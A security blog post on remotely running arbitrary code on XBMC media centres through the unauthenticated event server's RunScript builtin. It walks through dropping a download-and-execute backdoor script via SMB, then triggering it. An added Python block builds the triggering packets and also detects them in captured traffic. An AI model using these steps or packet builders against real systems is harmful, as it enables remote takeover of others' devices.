Thursday, April 25, 2013

how to abuse xbmc

As we mentioned in the previous post, we spent some time this past weekend playing around with XBMC as it is gaining in popularity and because we use it often as well.

Quick note before we get going - we're not trying to feed script kiddies. There are no videos, and the details are somewhat vague... on purpose.

We found a neat little hack to execute arbitrary code on xbmcbuntu, raspbmc, and Ubuntu with XBMC installed (those are the platforms we specifically tested). It probably works in similarly crafty ways on Windows and other platforms, but we couldn't be bothered to verify. The attack isn't crazy complex or sup3r1337z; rather it's (we like to think) a clever abuse of functionality.

The heart of this attack is that the RunScript builtin (XBMC.RunScript), which the event server will execute on behalf of any client that sends it, runs any Python script on the victim box that is readable by the user XBMC is running as. The event server has no authentication of its own, so the only barriers are reaching UDP 9777 and getting a script of your choosing onto the box.

Let's start with getting a shell on xbmcbuntu and raspbmc. This one is less interesting because it relies on SMB.

Pre-requisites:
  • The event server is running.
    • This is on by default on (we're pretty sure) all XBMC deployments.
    • The event server listens on UDP port 9777.
  • SMB is enabled without a password.
    • By default xbmcbuntu and raspbmc both ship with SMB enabled and no password set, so anyone on the network can write to the shares.
The attack is pretty straightforward:
  1. Create a Python script that downloads a file and executes it... maybe a backdoor?
  2. Upload this Python script to the victim over SMB, somewhere the xbmc user can read it.
  3. From a remote machine, send the victim's event server a RunScript action pointing at the file you dropped.
  4. Boom.
We spent some extra time playing with a default Ubuntu install, fully updated, with XBMC installed. The attack landscape was a little different here, as SMB isn't available out of the box, and certainly not without a password.

We got creative.

Pre-requisites:
  • The event server is running.
    • This is on by default on (we're pretty sure) all XBMC deployments.
    • The event server listens on UDP port 9777.
The attack:
  1. From a remote machine, send the victim's event server a RunScript action pointing at one of the Python scripts that is already on the Ubuntu box by default and can be abused to download a file. We're not going to spell out which one... it's not that hard to find.
  2. This call (in our tests) downloaded a Python script of our choosing to the victim.
  3. Send another RunScript action pointing at the script you just downloaded.
  4. Boom.
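To make the event server side of both procedures above concrete, here is an added example (ours, not code from the original post and not XBMC's own client library) that builds the HELO and RunScript action datagrams using the wire format from XBMC's tools/EventClients/lib/python/xbmcclient.py, and parses datagrams back out so you can flag script-execution builtins in captured UDP 9777 traffic. It assumes a client greets with a HELO before actions are accepted, which is what xbmcclient.py does; the device name, UID, IP addresses and the /home/xbmc/dropped.py path are made up for the sample.

```python
import struct

# Wire constants for the XBMC Event Server, as defined in XBMC's own
# tools/EventClients/lib/python/xbmcclient.py. Only these values come from
# that file; everything else in this block is an added example.
EVENTSERVER_PORT = 9777
HEADER_SIZE = 32
MAX_PACKET_SIZE = 1024
MAX_PAYLOAD_SIZE = MAX_PACKET_SIZE - HEADER_SIZE

PT_HELO = 0x01
PT_BYE = 0x02
PT_ACTION = 0x0A

ACTION_EXECBUILTIN = 0x01   # payload carries a builtin such as RunScript(...)
ACTION_BUTTON = 0x02        # payload carries a keymap action name

ICON_NONE = 0x00

# sig(4s) majver(B) minver(B) packettype(H) seq(L) maxseq(L) payloadsize(H) uid(L) reserved(10s)
HEADER_FMT = "!4sBBHLLHL10s"
assert struct.calcsize(HEADER_FMT) == HEADER_SIZE

# Builtins that hand control to caller-chosen code. Matched case-insensitively,
# with the legacy "XBMC." prefix stripped.
SCRIPT_BUILTINS = {"runscript", "system.exec", "system.execwait"}


def _header(packet_type, payload_size, uid, seq=1, maxseq=1):
    return struct.pack(HEADER_FMT, b"XBMC", 2, 0, packet_type, seq, maxseq,
                       payload_size, uid, b"\x00" * 10)


def build_helo_packet(device_name, uid=0x1234):
    """HELO packet: the greeting xbmcclient.py sends before anything else."""
    payload = (device_name.encode() + b"\x00" + bytes([ICON_NONE])
               + struct.pack("!HLL", 0, 0, 0))   # port, reserved1, reserved2
    return _header(PT_HELO, len(payload), uid) + payload


def build_action_packet(builtin, uid=0x1234):
    """PT_ACTION / ACTION_EXECBUILTIN packet carrying one builtin call."""
    payload = bytes([ACTION_EXECBUILTIN]) + builtin.encode() + b"\x00"
    if len(payload) > MAX_PAYLOAD_SIZE:
        # Longer payloads are split across seq/maxseq datagrams; not modelled here.
        raise ValueError("builtin does not fit a single Event Server datagram")
    return _header(PT_ACTION, len(payload), uid) + payload


def parse_packet(data):
    """Decode one UDP datagram; return a dict, or None if it is not an Event Server packet."""
    if len(data) < HEADER_SIZE:
        return None
    sig, majver, minver, ptype, seq, maxseq, psize, uid, _ = struct.unpack(
        HEADER_FMT, data[:HEADER_SIZE])
    if sig != b"XBMC" or majver != 2:
        return None
    payload = data[HEADER_SIZE:]
    if len(payload) != psize:
        return None          # truncated or padded: reject rather than guess
    pkt = {"type": ptype, "seq": seq, "maxseq": maxseq, "uid": uid, "payload": payload}
    if ptype == PT_ACTION and payload:
        pkt["action_type"] = payload[0]
        pkt["action"] = payload[1:].split(b"\x00", 1)[0].decode("utf-8", "replace")
    return pkt


def builtin_name(action):
    """'XBMC.RunScript(/tmp/x.py)' -> 'runscript'."""
    name = action.split("(", 1)[0].strip().lower()
    return name[5:] if name.startswith("xbmc.") else name


def is_script_execution(pkt):
    """True when the packet asks XBMC to run a script or external program."""
    if not pkt or pkt.get("type") != PT_ACTION:
        return False
    if pkt.get("action_type") != ACTION_EXECBUILTIN:
        return False
    return builtin_name(pkt["action"]) in SCRIPT_BUILTINS


def flag_datagrams(datagrams):
    """Run the check over (src, payload) pairs, e.g. from a pcap; return flagged builtins."""
    hits = []
    for src, data in datagrams:
        pkt = parse_packet(data)
        if is_script_execution(pkt):
            hits.append((src, pkt["action"]))
    return hits


if __name__ == "__main__":
    # Constructed sample traffic: one remote client greeting, then asking XBMC
    # to run a script it previously dropped. Addresses and path are made up.
    sample = [
        ("192.0.2.10", build_helo_packet("livingroom-remote")),
        ("192.0.2.10", build_action_packet("XBMC.RunScript(/home/xbmc/dropped.py)")),
        ("192.0.2.11", build_action_packet("Notification(Hello,World)")),
        ("192.0.2.12", b"not an event server packet"),
    ]
    for src, action in flag_datagrams(sample):
        print(f"{src}: {action}")
```

The parser rejects anything whose declared payload size doesn't match the datagram, so a sensor doesn't guess at truncated packets; builtins split across several datagrams (maxseq > 1) aren't reassembled here. On the defensive side, the quick check is whether 9777/udp is reachable from anything other than your remote control. If it doesn't need to be, firewall it or turn the event server off in XBMC's services settings.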
We also found a way to list directory contents using a JSON-RPC over HTTP request, and a way to pull files from XBMC on Ubuntu. We'll write these up in another blog post.

All of this gives you the privileges of whatever user XBMC was running as. Usually that's a regular user, but once you have a shell you can look at local vulns to escalate.

Note: we posted this a while back but pulled it back into draft as we wanted to formalize it with a POC. We won't be releasing a formal write-up, as in the time we were being lazy others already have.